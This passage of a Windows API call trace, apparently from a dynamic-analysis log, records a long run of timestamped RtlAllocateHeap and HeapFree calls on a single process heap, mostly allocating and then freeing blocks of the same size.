(HeapHandle=0x570000, Flags=0x0, Size=0x1f8) returned 0x588910 [0183.103] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x57b0b0 | out: hHeap=0x570000) returned 1 [0183.103] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2194de0 [0183.103] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21a7ff0 [0183.104] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21bb200 [0183.104] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21ce410 [0183.105] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x21f0080 [0183.106] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2203290 [0183.106] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22164a0 [0183.106] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22296b0 [0183.107] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x223c8c0 [0183.107] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x224fad0 [0183.108] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2262ce0 [0183.108] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2275ef0 [0183.109] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2289100 [0183.109] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x229c310 [0183.110] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22af520 [0183.111] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22c2730 [0183.111] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22d5940 [0183.271] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22e8b50 [0183.272] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x22fbd60 [0183.272] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x230ef70 [0183.273] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2322180 [0183.273] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x2f0) returned 0x588b10 [0183.273] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0183.273] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2335390 [0183.274] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23485a0 [0183.274] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x235b7b0 [0183.275] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x236e9c0 [0183.275] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2381bd0 [0183.276] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2394de0 [0183.276] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23a7ff0 [0183.277] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23bb200 [0183.277] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23ce410 [0183.278] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23e1620 [0183.278] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x23f4830 [0183.279] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2407a40 [0183.319] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x241ac50 [0183.320] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x242de60 [0183.320] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2441070 [0183.321] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2454280 [0183.321] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2467490 [0183.322] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x247a6a0 [0183.322] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x248d8b0 [0183.323] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24a0ac0 [0183.323] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24b3cd0 [0183.324] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24c6ee0 [0183.324] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24da0f0 [0183.325] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x24ed300 [0183.325] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2500510 [0183.326] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2513720 [0183.326] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2526930 [0183.326] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2539b40 [0183.326] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x254cd50 [0183.327] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x255ff60 [0183.327] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2573170 [0183.328] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x468) returned 0x59c5f0 [0183.328] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588b10 | out: hHeap=0x570000) returned 1 [0183.328] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2586380 [0183.329] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2599590 [0183.329] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25ac7a0 [0183.330] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25bf9b0 [0183.331] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25d2bc0 [0183.331] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x25f0080 [0183.332] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2603290 [0183.333] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26164a0 [0183.333] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26296b0 [0183.334] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x263c8c0 [0183.334] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x264fad0 [0183.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2662ce0 [0183.335] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2675ef0 [0183.336] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2689100 [0183.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x269c310 [0183.337] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26af520 [0183.341] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26c2730 [0183.342] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26d5940 [0183.342] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26e8b50 [0183.343] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x26fbd60 [0183.343] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x270ef70 [0183.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2722180 [0183.344] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2735390 [0183.345] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27485a0 [0183.345] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x275b7b0 [0183.346] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x276e9c0 [0183.347] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2781bd0 [0183.347] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2794de0 [0183.347] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27a7ff0 [0183.347] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27bb200 [0183.518] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27ce410 [0183.519] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27e1620 [0183.519] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x27f4830 [0183.520] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2807a40 [0183.520] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x281ac50 [0183.521] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x282de60 [0183.521] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2841070 [0183.522] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2854280 [0183.523] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2867490 [0183.523] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x287a6a0 [0183.524] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x288d8b0 [0183.524] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28a0ac0 [0183.525] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28b3cd0 [0183.525] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28c6ee0 [0183.526] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28da0f0 [0183.526] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x28ed300 [0183.527] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2900510 [0183.527] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x698) returned 0x588910 [0183.527] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c5f0 | out: hHeap=0x570000) returned 1 [0183.527] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2913720 [0183.528] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2926930 [0183.528] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2939b40 [0183.529] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x294cd50 [0183.529] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x295ff60 [0183.530] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2973170 [0183.530] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2986380 [0183.530] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2999590 [0183.531] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29ac7a0 [0183.531] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29bf9b0 [0183.532] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29d2bc0 [0183.533] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29e5dd0 [0183.533] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x29f8fe0 [0183.534] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a0c1f0 [0183.534] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a1f400 [0183.535] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a32610 [0183.535] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a45820 [0183.536] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a58a30 [0183.536] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a6bc40 [0183.537] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a7ee50 [0183.538] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2a92060 [0183.538] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2aa5270 [0183.539] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ab8480 [0183.539] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2acb690 [0183.540] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ade8a0 [0183.540] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2af1ab0 [0183.540] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b04cc0 [0183.541] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b17ed0 [0183.542] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b2b0e0 [0183.542] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b3e2f0 [0183.543] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b51500 [0183.544] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b64710 [0183.544] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b77920 [0183.545] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b8ab30 [0183.545] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2b9dd40 [0183.546] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bb0f50 [0183.547] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bc4160 [0183.547] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bd7370 [0183.548] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bea580 [0183.548] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2bfd790 [0183.549] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c109a0 [0183.550] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c23bb0 [0183.550] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c36dc0 [0183.551] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c49fd0 [0183.551] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c5d1e0 [0183.552] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c703f0 [0183.553] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c83600 [0183.553] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2c96810 [0183.750] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ca9a20 [0183.750] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2cbcc30 [0183.750] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ccfe40 [0183.751] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ce3050 [0183.752] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2cf6260 [0183.752] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d09470 [0183.753] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d1c680 [0183.753] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d2f890 [0183.754] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d42aa0 [0183.754] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d55cb0 [0183.755] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d68ec0 [0183.755] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d7c0d0 [0183.756] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2d8f2e0 [0183.757] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2da24f0 [0183.757] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2db5700 [0183.758] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2dc8910 [0183.758] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2df0080 [0183.760] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e03290 [0183.760] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e164a0 [0183.761] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e296b0 [0183.762] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e3c8c0 [0183.762] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e4fad0 [0183.763] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x9e0) returned 0x59c5f0 [0183.763] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x588910 | out: hHeap=0x570000) returned 1 [0183.763] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e62ce0 [0183.763] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e75ef0 [0183.764] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e89100 [0183.764] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2e9c310 [0183.765] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2eaf520 [0183.765] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ec2730 [0183.766] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ed5940 [0183.766] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2ee8b50 [0183.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2efbd60 [0183.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f0ef70 [0183.767] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f22180 [0183.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f35390 [0183.768] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f485a0 [0183.769] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f5b7b0 [0183.769] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x13200) returned 0x2f6e9c0 [0183.960] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59c5f0 | out: hHeap=0x570000) returned 1 [0192.278] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5a7480 | out: hHeap=0x570000) returned 1 [0192.278] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5c7280 | out: hHeap=0x570000) returned 1 [0192.278] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5da490 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ed6a0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x6008b0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x613ac0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x626cd0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x639ee0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x64d0f0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1e90080 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1ea3290 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1eb64a0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1ec96b0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1edc8c0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1eefad0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f02ce0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f15ef0 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f29100 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f3c310 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f4f520 | out: hHeap=0x570000) returned 1 [0192.279] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1f62730 | out: hHeap=0x570000) returned 1 [0192.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x1ff0080 | out: hHeap=0x570000) returned 1 [0192.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2003290 | out: hHeap=0x570000) returned 1 [0192.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20164a0 | out: hHeap=0x570000) returned 1 [0192.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20296b0 | out: hHeap=0x570000) returned 1 [0192.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x203c8c0 | out: hHeap=0x570000) returned 1 [0192.340] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x204fad0 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2062ce0 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2075ef0 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2089100 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x209c310 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20af520 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20c2730 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20d5940 | out: hHeap=0x570000) returned 1 [0192.342] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20e8b50 | out: hHeap=0x570000) returned 1 [0192.558] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20fbd60 | out: hHeap=0x570000) returned 1 [0192.558] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x210ef70 | out: hHeap=0x570000) returned 1 [0192.558] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2122180 | out: hHeap=0x570000) returned 1 [0192.558] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2135390 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21485a0 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x215b7b0 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x216e9c0 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2181bd0 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2194de0 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21a7ff0 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21bb200 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21ce410 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21f0080 | out: hHeap=0x570000) returned 1 [0192.559] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2203290 | out: hHeap=0x570000) returned 1 [0192.565] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22164a0 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22296b0 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x223c8c0 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x224fad0 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2262ce0 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2275ef0 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2289100 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x229c310 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22af520 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22c2730 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22d5940 | out: hHeap=0x570000) returned 1 [0192.566] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22e8b50 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22fbd60 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x230ef70 | out: hHeap=0x570000) returned 1 [0192.571] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2322180 | out: hHeap=0x570000) returned 1 